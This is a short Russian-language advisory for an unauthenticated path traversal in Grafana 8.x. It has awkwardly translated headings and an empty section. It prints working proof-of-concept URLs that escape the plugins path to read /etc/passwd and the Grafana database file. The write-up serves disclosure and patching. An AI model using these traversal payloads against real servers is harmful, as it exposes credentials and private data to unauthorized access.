Предисловие：

Grafana — это кроссплатформенный инструмент анализа и визуализации измерений с открытым исходным кодом, который может запрашивать собранные данные, а затем отображать их визуально и предоставлять своевременные уведомления. Инструмент визуализации данных с открытым исходным кодом, разработанный на языке Go, который может выполнять мониторинг данных и статистику, а также имеет функцию сигнализации. В настоящее время Grafana используют многие компании, такие как Paypal, eBay, Intel и т. д.

Краткое описание уязвимости:

Неавторизованный злоумышленник может воспользоваться этой уязвимостью для получения конфиденциальных файлов на сервере.

Установить:

Github：

https://github.com/grafana/grafana

DockerУстановить:

https://www.voidking.com/dev-docker-grafana/

Затронутые версии:

Grafana 8.x

Скретч-офф:

http://x.x.x.x/public/plugins/graph/../../../../../../../etc/passwd

http://x.x.x.x/public/plugins/graph/../../../../../../../var/lib/grafana/grafana.db

http://x.x.x.x/public/plugins/grafana-clock-panel/../../../../../../../etc/passwd

Установленные по умолчанию компоненты:

Рекомендации по исправлению:

На данный момент соответствующих патчей нет, поэтому обратите внимание на официальные обновления, чтобы получить последнюю версию.